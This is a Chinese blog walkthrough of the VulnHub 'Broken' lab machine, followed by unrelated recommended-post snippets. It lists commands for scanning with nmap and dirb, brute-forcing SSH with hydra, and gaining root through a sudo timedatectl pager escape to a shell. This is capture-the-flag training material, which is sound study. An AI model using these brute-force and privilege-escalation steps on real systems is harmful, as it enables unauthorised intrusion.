Broken

最新推荐文章于 2024-08-13 19:54:16 发布
最新推荐文章于 2024-08-13 19:54:16 发布
阅读量233 收藏 3
点赞数 9
分类专栏: vulnhub 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52953960/article/details/141110067
版权

一、信息收集

1、主机发现

nmap 192.168.236.0/24

2、端口扫描

nmap 192.168.236.172 -p- -A

3、目录扫描

dirb http://192.168.236.172

二、漏洞探测

访问80端口,发现一些文件

README.md 中是十六进制的值

将内容写入readme.md中,使用 xxd 转换

xxd -r -ps readme.md > readme.bin

查看文件,发现文件头为 JFIF ,是一张图片

将后缀修改为 jpg ,查看图片

一段留言,把上面的一些可能作为账号密码的字符拿下来,写个简单的字典,尝试爆破 ssh

Bob
BROKEN
avrahamcohen.ac
broken

三、GetShell

使用 hydra 进行爆破,得到账号密码

hydra -L users.txt -P pass.txt ssh://192.168.236.172
broken:broken

ssh连接

ssh broken@192.168.236.172

四、提权

查看具有root权限的命令

sudo -l

看到 timedatectl 可以执行root权限,执行命令,提权成功

sudo timedatectl list-timezones

!/bin/bash

花椒椒椒
关注
专栏目录
WARNING:Retrying(Retry(total=2)) after connection broken by ‘ProxyError(‘Cannot connect to proxy解决方案
weixin_43178406的博客
06-15 10万+
本文主要介绍了WARNING: Retrying (Retry(total=2, connect=None, read=None, redirect=None, status=None)) after connection broken by 'ProxyError('Cannot connect to proxy.'解决方案,希望能对使用Python pip的同学们有所帮助。 文章目录 1. 问题描述 2. 解决方案
java broken pipe_如何解决:Broken pipe
weixin_39964528的博客
02-16 1626
我做了一个登录拦截,拦截器如下:package com.product.website.interceptor;import javax.servlet.http.HttpServletRequest;import javax.servlet.http.HttpServletResponse;import org.apache.log4j.Logger;import org.springframe...
Broken Pipe的解决方案
2301_79779756的博客
05-04 2800
Broken Pipe” 是一个常见的网络编程错误,特别是在使用像 TCP 这样的流协议时。这个错误通常表示在数据传输过程中,客户端或服务器的一方在另一方尝试写入数据时关闭了连接。
Broken pipe
weixin_42164207的博客
02-13 7355
叙述     想必或多或少在Java的服务器都会遇到过这种异常,如下图          由于Java偏上层,日常开发接触系统底层的机会偏少,要搞清楚什么原因导致的这种异常,肯定是先要百度google一番。 网络解释云里雾里     百度+google下,巴拉巴拉还真不少介绍这个错误的文章。欣喜地翻了一篇又一篇,但好像我依旧不明白具体什么原因导致的,云里雾里啊。好吧,举两个例子:     例子一...
Broken靶机
2401_84564260的博客
08-13 416
发现是一段留言,把上面的一些可能作为账号密码的字符拿下来 做一个简单的字典进行爆破。将内容写入到readme.md中 使用xxd转换。发现timedatectl可以执行root权限。访问readme.md 发现是十六进制的值。查看文件,发现文件头为JFIF。发现账号密码都是broken。将后缀改为jpg,查看图片。使用kail进行扫描ip。探测靶机主机,端口,服务。使用hydra进行爆破。查看靶机的mac地址。
关于Broken pipe异常的一点学习记录
github_38727595的博客
05-22 2104
Broken pipe是什么,什么情况下会出现Broken pipe错误,应该如何规避或处理这类问题
socketException之broken pipe
sully2008的专栏
01-13 3685
周末在做数据库迁移时,DBA在插数据到某个大表时,锁表导致应用程序报“Broken pipe”的错误 I know that broken pipe error is thrown when the socket on the peer side is closed. But, in my test I have noted that an immediate 'send' call...
broken靶机
weixin_71232352的博客
08-12 426
broken靶机
Broken Pipe问题及其解决
热门推荐
keyboard专栏
07-07 2万+
到底什么是断管? 简单来说,Broken Pipe 意味着一台机器正在尝试从管道读取数据或向管道写入数据,而管道另一端的机器已经死亡或终止。现在,由于连接已关闭,应建立新连接以进一步传输数据,否则数据传输将停止。此问题的最常见原因之一是客户端在执行任何操作(如加载页面或下载附件)时关闭打开的连接。当使用 Nginx 之类的代理/负载均衡器(例如关闭 Web 浏览器甚至简单地取消下载)或连接速度很慢时,强制关闭某些连接也会发生这种情况。一个简单的场景:浏览器向服务器请求资源,作为响应,服务器向浏览器返回响应。
php Broken pipe,Python提示[Errno 32]Broken pipe导致线程crash错误解决方法
weixin_39582708的博客
03-27 754
本文实例讲述了Python提示[Errno 32]Broken pipe导致线程crash错误解决方法。分享给大家供大家参考。具体方法如下:1. 错误现象ThreadingHTTPServer 实现的 http 服务,如果客户端在服务器返回前,主动断开连接,则服务器端会报 [Errno 32] Broken pipe 错,并导致处理线程 crash.下面先看个例子,python 版本: 2.7示例...
springboot+netty实现mqtt协议的broken
11-09
标题"springboot+netty实现mqtt协议的broken"可能意味着这个项目旨在解决Spring Boot与Netty集成时可能出现的问题,或者是一个关于如何处理MQTT连接中断的教程。在实际应用中,MQTT连接可能会因为各种原因断开,例如...
OWASP_Broken_Web_Apps_VM_1.2
02-16
### OWASP Broken Web Apps VM 1.2:深入解析与实战指南 #### 一、OWASP Broken Web Apps VM 概览 **OWASP Broken Web Apps VM**(虚拟机)是OWASP基金会推出的一个用于安全测试的学习平台。它包含了多个故意设计...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8491
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
灰色GM(1,1)模型及其在电力负荷预测中的应用附Matlab代码.rar
10-07
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
基于Java的华奥汽车销售集团网.zip
10-07
基于Java的华奥汽车销售集团网.zip
探索 GRU:深度学习中门控循环单元的魅力(包含详细的完整的程序和数据)
最新发布
10-07
内容概要:本文首先介绍了GRU的基础概念及其工作原理,并着重讨论了其相对于LSTM的优势以及双向GRU的特点;之后,使用生成的正弦波形数据作为训练样本,详细讲解并提供了一段完整的实现GRU的时间序列预测案例,包括数据生成、准备、GRU模型构建与训练的具体步骤。 适用人群:具有一定编程经验并且想要掌握使用GRU完成时间序列数据分析的机器学习开发者或研究人员。 使用场景及目标:学习使用PyTorch开发工具建立基于GRU的模型,对如股市涨跌趋势预测或其他连续数值变化趋势预测等时序问题进行建模,更好地把握长期和短期的趋势。 阅读提示:为了确保理解和实践过程的连贯性,建议按文中顺序逐步实施各环节。尤其关注超参数调整以及过拟合预防方面的技巧和方法。此外,尝试拓展模型应用范围至更多样的时间和序列任务,以促进自己的技能进步和技术深化。
代码案例-仪表日置DM7275
10-07
代码案例演示仪表工具一般情况(返回单个值)
broken pipe
07-28
回答: Broken Pipe是指一台机器正在尝试从管道读取数据或向管道写入数据,而管道另一端的机器已经死亡或终止。\[2\]当服务器一次运行在相对大量的用户请求上时,不仅是Broken Pipe,任何异常似乎都会造成问题。\[1\]...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值